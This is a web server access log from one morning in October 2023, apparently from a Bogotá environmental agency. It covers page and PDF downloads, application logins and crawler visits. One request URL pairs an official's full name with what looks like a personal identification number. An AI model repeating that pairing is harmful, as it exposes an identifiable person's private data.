201.245.192.253 - - [25/Oct/2023:05:39:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
173.252.107.3 - - [25/Oct/2023:05:39:47 -0500] "GET /con-plantacion-de-arboles-sigue-la-consolidacion-de-los-conectores-ecosistemicos-en-bogota.html HTTP/1.1" 200 896
173.252.107.116 - - [25/Oct/2023:05:39:47 -0500] "GET /con-plantacion-de-arboles-sigue-la-consolidacion-de-los-conectores-ecosistemicos-en-bogota.html HTTP/1.1" 200 896
173.252.107.118 - - [25/Oct/2023:05:40:00 -0500] "GET /avances-en-la-gestion-de-sitios-contaminados-en-bogota.html HTTP/1.1" 200 833
173.252.107.4 - - [25/Oct/2023:05:40:00 -0500] "GET /avances-en-la-gestion-de-sitios-contaminados-en-bogota.html HTTP/1.1" 200 833
201.245.192.253 - - [25/Oct/2023:05:40:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40510
201.245.192.253 - - [25/Oct/2023:05:40:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39166
186.29.165.62 - - [25/Oct/2023:05:40:13 -0500] "GET /BLA/resoluciones/AUTOS%202014/5217.pdf HTTP/1.1" 200 837973
186.29.165.62 - - [25/Oct/2023:05:40:14 -0500] "GET /BLA/resoluciones/AUTOS%202014/5217.pdf HTTP/1.1" 200 837973
216.245.221.92 - - [25/Oct/2023:05:40:55 -0500] "HEAD / HTTP/1.1" 200 -
18.210.147.12 - - [25/Oct/2023:05:41:02 -0500] "HEAD /ingresar-a-los-cuerpos-de-agua-de-los-humedales-esta-prohibido-no-arriesgues-tu-vida-por-unos-me-gusta.html HTTP/1.1" 200 -
173.252.107.4 - - [25/Oct/2023:05:41:16 -0500] "GET /ingresar-a-los-cuerpos-de-agua-de-los-humedales-esta-prohibido-no-arriesgues-tu-vida-por-unos-me-gusta.html HTTP/1.1" 200 894
173.252.107.10 - - [25/Oct/2023:05:41:16 -0500] "GET /ingresar-a-los-cuerpos-de-agua-de-los-humedales-esta-prohibido-no-arriesgues-tu-vida-por-unos-me-gusta.html HTTP/1.1" 200 894
172.22.2.4 - - [25/Oct/2023:05:41:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2023:05:43:19 -0500] "GET /BLA/boletinlegal/index.html HTTP/1.1" 404 1018
66.249.66.20 - - [25/Oct/2023:05:43:30 -0500] "GET /BLA/resoluciones/Autos%202008/1412.pdf HTTP/1.1" 200 340105
34.34.60.140 - - [25/Oct/2023:05:43:41 -0500] "GET /caminatas-ecologicas-un-plan-imperdible-para-octubre.html HTTP/1.1" 200 747
201.245.192.253 - - [25/Oct/2023:05:44:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
172.22.2.4 - - [25/Oct/2023:05:43:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62469
216.245.221.92 - - [25/Oct/2023:05:45:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2023:05:46:55 -0500] "GET /BLA/boletinlegal/index.asp HTTP/1.1" 404 1018
40.77.167.22 - - [25/Oct/2023:05:47:35 -0500] "GET /Publicaciones/2023EE245569.pdf HTTP/1.1" 200 372529
40.77.167.22 - - [25/Oct/2023:05:47:36 -0500] "GET /Publicaciones/2023EE245189.pdf HTTP/1.1" 200 231865
173.252.83.119 - - [25/Oct/2023:05:48:43 -0500] "GET /images/Reciclaton-2023.jpg HTTP/1.1" 200 68883
201.245.192.253 - - [25/Oct/2023:05:49:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
172.22.2.4 - - [25/Oct/2023:05:48:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.19 - - [25/Oct/2023:05:50:28 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/429.pdf HTTP/1.1" 200 386936
172.22.2.4 - - [25/Oct/2023:05:48:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60331
172.22.2.4 - - [25/Oct/2023:05:50:39 -0500] "GET /BLA/boletinlegal/index.asp HTTP/1.1" 404 1018
186.102.46.35 - - [25/Oct/2023:05:50:42 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.102.46.35 - - [25/Oct/2023:05:50:42 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
186.102.46.35 - - [25/Oct/2023:05:50:42 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
186.102.46.35 - - [25/Oct/2023:05:50:42 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
186.102.46.35 - - [25/Oct/2023:05:50:42 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
186.102.46.35 - - [25/Oct/2023:05:50:42 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.102.46.35 - - [25/Oct/2023:05:50:46 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
186.102.46.35 - - [25/Oct/2023:05:50:50 -0500] "POST /appsia/controlador HTTP/1.1" 200 7773
186.102.46.35 - - [25/Oct/2023:05:50:53 -0500] "POST /appsia/controlador HTTP/1.1" 200 6638
216.245.221.92 - - [25/Oct/2023:05:50:55 -0500] "HEAD / HTTP/1.1" 200 -
186.102.46.35 - - [25/Oct/2023:05:50:56 -0500] "POST /appsia/controlador HTTP/1.1" 200 9884
186.102.46.35 - - [25/Oct/2023:05:51:44 -0500] "POST /appsia/controlador HTTP/1.1" 200 7773
186.102.46.35 - - [25/Oct/2023:05:51:51 -0500] "POST /appsia/controlador HTTP/1.1" 200 6638
186.102.46.35 - - [25/Oct/2023:05:51:53 -0500] "POST /appsia/controlador HTTP/1.1" 200 11067
66.249.66.19 - - [25/Oct/2023:05:52:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5342.pdf HTTP/1.1" 200 503351
172.22.2.4 - - [25/Oct/2023:05:53:05 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 200 276868
52.167.144.161 - - [25/Oct/2023:05:53:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/1719.pdf HTTP/1.1" 200 447310
172.22.2.4 - - [25/Oct/2023:05:53:56 -0500] "GET /BLA/boletinlegal/video.html HTTP/1.1" 404 1018
201.245.192.253 - - [25/Oct/2023:05:54:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
52.167.144.11 - - [25/Oct/2023:05:54:27 -0500] "GET /sitemaps.xml HTTP/1.1" 404 1034
66.249.66.19 - - [25/Oct/2023:05:54:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/RESOLUCION%20326%20DE%202010.PDF HTTP/1.1" 200 31656
172.22.2.4 - - [25/Oct/2023:05:53:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [25/Oct/2023:05:55:37 -0500] "GET /BLA/resoluciones/AUTOS%202008/0035.pdf HTTP/1.1" 200 84738
216.244.66.195 - - [25/Oct/2023:05:55:42 -0500] "GET /BLA/resoluciones/AUTOS%202008/0805.pdf HTTP/1.1" 200 83909
216.244.66.195 - - [25/Oct/2023:05:55:47 -0500] "GET /BLA/resoluciones/AUTOS%202008/0946.pdf HTTP/1.1" 200 72765
216.244.66.195 - - [25/Oct/2023:05:55:50 -0500] "GET /BLA/resoluciones/AUTOS%202008/1178.pdf HTTP/1.1" 200 87489
216.244.66.195 - - [25/Oct/2023:05:55:54 -0500] "GET /BLA/resoluciones/AUTOS%202008/1518.pdf HTTP/1.1" 200 75923
216.245.221.92 - - [25/Oct/2023:05:55:55 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [25/Oct/2023:05:55:57 -0500] "GET /BLA/resoluciones/AUTOS%202008/1717.pdf HTTP/1.1" 200 93283
216.244.66.195 - - [25/Oct/2023:05:56:00 -0500] "GET /BLA/resoluciones/AUTOS%202009/0612.pdf HTTP/1.1" 200 122654
216.244.66.195 - - [25/Oct/2023:05:56:03 -0500] "GET /BLA/resoluciones/AUTOS%202013/0015.pdf HTTP/1.1" 200 1750270
216.244.66.195 - - [25/Oct/2023:05:56:09 -0500] "GET /BLA/resoluciones/AUTOS%202013/1153.pdf HTTP/1.1" 200 1775011
216.244.66.195 - - [25/Oct/2023:05:56:18 -0500] "GET /BLA/resoluciones/AUTOS%202013/2106.pdf HTTP/1.1" 200 1687420
172.22.2.4 - - [25/Oct/2023:05:54:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60331
216.244.66.195 - - [25/Oct/2023:05:56:25 -0500] "GET /BLA/resoluciones/AUTOS%202013/2613.pdf HTTP/1.1" 200 810393
216.244.66.195 - - [25/Oct/2023:05:56:31 -0500] "GET /BLA/resoluciones/AUTOS%202014/2664.pdf HTTP/1.1" 200 481984
216.244.66.195 - - [25/Oct/2023:05:56:36 -0500] "GET /BLA/resoluciones/AUTOS%202015/0664.pdf HTTP/1.1" 200 552004
216.244.66.195 - - [25/Oct/2023:05:56:40 -0500] "GET /BLA/resoluciones/AUTOS%202015/3330.pdf HTTP/1.1" 200 633575
216.244.66.195 - - [25/Oct/2023:05:56:45 -0500] "GET /BLA/resoluciones/AUTOS%202015/3352.pdf HTTP/1.1" 200 494476
172.22.2.4 - - [25/Oct/2023:05:57:37 -0500] "GET /BLA/boletinlegal/video.html HTTP/1.1" 404 1018
66.249.66.20 - - [25/Oct/2023:05:58:11 -0500] "GET /BLA/resoluciones/AUTOS%202008/2794.pdf HTTP/1.1" 200 109420
40.77.167.60 - - [25/Oct/2023:05:59:13 -0500] "GET /Publicaciones/2023EE243276.pdf HTTP/1.1" 200 1188643
201.245.192.253 - - [25/Oct/2023:05:59:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
216.245.221.92 - - [25/Oct/2023:06:00:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2023:06:01:10 -0500] "GET /BLA/boletinlegal/2.0/gui/ HTTP/1.1" 404 1018
172.22.2.4 - - [25/Oct/2023:05:59:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2023:06:00:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60682
123.125.109.139 - - [25/Oct/2023:06:02:46 -0500] "GET / HTTP/1.1" 200 319
40.77.167.60 - - [25/Oct/2023:06:03:56 -0500] "GET /Publicaciones/2023EE244408.pdf HTTP/1.1" 200 969795
201.245.192.253 - - [25/Oct/2023:06:04:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
172.22.2.4 - - [25/Oct/2023:06:04:42 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [25/Oct/2023:06:04:46 -0500] "GET /BLA/boletinlegal/2.0/gui/ HTTP/1.1" 404 1018
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12408
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:05:39 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
216.245.221.92 - - [25/Oct/2023:06:05:55 -0500] "HEAD / HTTP/1.1" 200 -
186.80.52.180 - - [25/Oct/2023:06:05:55 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2217
186.80.52.180 - - [25/Oct/2023:06:05:55 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:11 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16334
186.80.52.180 - - [25/Oct/2023:06:06:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:12 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:12 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:12 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:12 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:12 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:12 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:12 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:18 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:18 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
186.80.52.180 - - [25/Oct/2023:06:06:21 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 64268
186.80.52.180 - - [25/Oct/2023:06:06:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:22 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.180 - - [25/Oct/2023:06:06:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1548
186.80.52.180 - - [25/Oct/2023:06:06:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 46666
186.80.52.180 - - [25/Oct/2023:06:06:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1552
186.80.52.180 - - [25/Oct/2023:06:06:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32453
186.80.52.180 - - [25/Oct/2023:06:06:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 44899
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [25/Oct/2023:06:06:30 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [25/Oct/2023:06:06:31 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [25/Oct/2023:06:06:31 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [25/Oct/2023:06:06:31 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [25/Oct/2023:06:06:31 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [25/Oct/2023:06:06:31 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [25/Oct/2023:06:06:31 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [25/Oct/2023:06:06:31 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
186.80.52.180 - - [25/Oct/2023:06:06:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5082
186.80.52.180 - - [25/Oct/2023:06:06:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32394
152.201.119.116 - - [25/Oct/2023:06:06:59 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13696
152.201.119.116 - - [25/Oct/2023:06:06:59 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
152.201.119.116 - - [25/Oct/2023:06:06:59 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
152.201.119.116 - - [25/Oct/2023:06:06:59 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
152.201.119.116 - - [25/Oct/2023:06:06:59 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
152.201.119.116 - - [25/Oct/2023:06:07:03 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
152.201.119.116 - - [25/Oct/2023:06:07:03 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
152.201.119.116 - - [25/Oct/2023:06:07:03 -0500] "GET /BLA/resoluciones/dlf/archive.png HTTP/1.1" 200 632
152.201.119.116 - - [25/Oct/2023:06:07:02 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 389290
172.22.2.4 - - [25/Oct/2023:06:05:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2023:06:06:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58309
172.22.2.4 - - [25/Oct/2023:06:08:18 -0500] "GET /BLA/boletinlegal/mm/ HTTP/1.1" 404 1018
79.110.62.146 - - [25/Oct/2023:06:08:33 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [25/Oct/2023:06:09:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
31.13.127.25 - - [25/Oct/2023:06:09:32 -0500] "GET /ingresar-a-los-cuerpos-de-agua-de-los-humedales-esta-prohibido-no-arriesgues-tu-vida-por-unos-me-gusta.html HTTP/1.1" 200 894
216.245.221.92 - - [25/Oct/2023:06:10:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2023:06:11:58 -0500] "GET /BLA/boletinlegal/mm/ HTTP/1.1" 404 1018
172.22.2.4 - - [25/Oct/2023:06:11:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2023:06:12:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58309
201.245.192.253 - - [25/Oct/2023:06:14:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
172.22.2.4 - - [25/Oct/2023:06:15:30 -0500] "GET /BLA/boletinlegal/ui HTTP/1.1" 404 1018
216.245.221.92 - - [25/Oct/2023:06:15:55 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Oct/2023:06:16:30 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [25/Oct/2023:06:16:30 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
201.245.192.253 - - [25/Oct/2023:06:16:30 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
201.245.192.253 - - [25/Oct/2023:06:16:30 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
201.245.192.253 - - [25/Oct/2023:06:16:30 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
201.245.192.253 - - [25/Oct/2023:06:16:35 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
201.245.192.253 - - [25/Oct/2023:06:16:38 -0500] "POST /appsia/controlador HTTP/1.1" 200 7789
201.245.192.253 - - [25/Oct/2023:06:16:46 -0500] "POST /appsia/controlador HTTP/1.1" 200 6658
201.245.192.253 - - [25/Oct/2023:06:16:57 -0500] "POST /appsia/controlador HTTP/1.1" 200 10972
66.249.66.19 - - [25/Oct/2023:06:17:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3393.pdf HTTP/1.1" 200 626248
201.245.192.253 - - [25/Oct/2023:06:17:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40386
201.245.192.253 - - [25/Oct/2023:06:17:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39348
52.167.144.235 - - [25/Oct/2023:06:17:20 -0500] "GET /BLA/resoluciones/AUTOS%202015/6679.pdf HTTP/1.1" 200 514050
40.77.167.5 - - [25/Oct/2023:06:17:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/1366.pdf HTTP/1.1" 200 458594
201.245.192.253 - - [25/Oct/2023:06:18:15 -0500] "POST /appsia/controlador HTTP/1.1" 200 7789
181.58.209.106 - - [25/Oct/2023:06:18:17 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2276.pdf HTTP/1.1" 200 3954700
181.58.209.106 - - [25/Oct/2023:06:18:17 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/2276.pdf HTTP/1.1" 206 2589367
201.245.192.253 - - [25/Oct/2023:06:18:24 -0500] "POST /appsia/controlador HTTP/1.1" 200 6658
201.245.192.253 - - [25/Oct/2023:06:18:26 -0500] "POST /appsia/controlador HTTP/1.1" 200 10977
172.22.2.4 - - [25/Oct/2023:06:17:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.53.96.147 - - [25/Oct/2023:06:19:14 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
201.245.192.253 - - [25/Oct/2023:06:19:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
201.245.192.253 - - [25/Oct/2023:06:19:16 -0500] "GET /appsia/controlador?comando=regresar&id=79793608&funcionario=HERNAN+GONZALO+CADENA+CARRE%C3%83%C2%91O&desde=79793608&hasta=79793608&version=79793608 HTTP/1.1" 200 7789
172.22.2.4 - - [25/Oct/2023:06:19:18 -0500] "GET /BLA/boletinlegal/ui HTTP/1.1" 404 1018
181.53.96.147 - - [25/Oct/2023:06:19:26 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
181.53.96.147 - - [25/Oct/2023:06:19:30 -0500] "POST /appsia/controlador HTTP/1.1" 200 7791
181.53.96.147 - - [25/Oct/2023:06:19:34 -0500] "POST /appsia/controlador HTTP/1.1" 200 6660
181.53.96.147 - - [25/Oct/2023:06:19:36 -0500] "POST /appsia/controlador HTTP/1.1" 200 10592
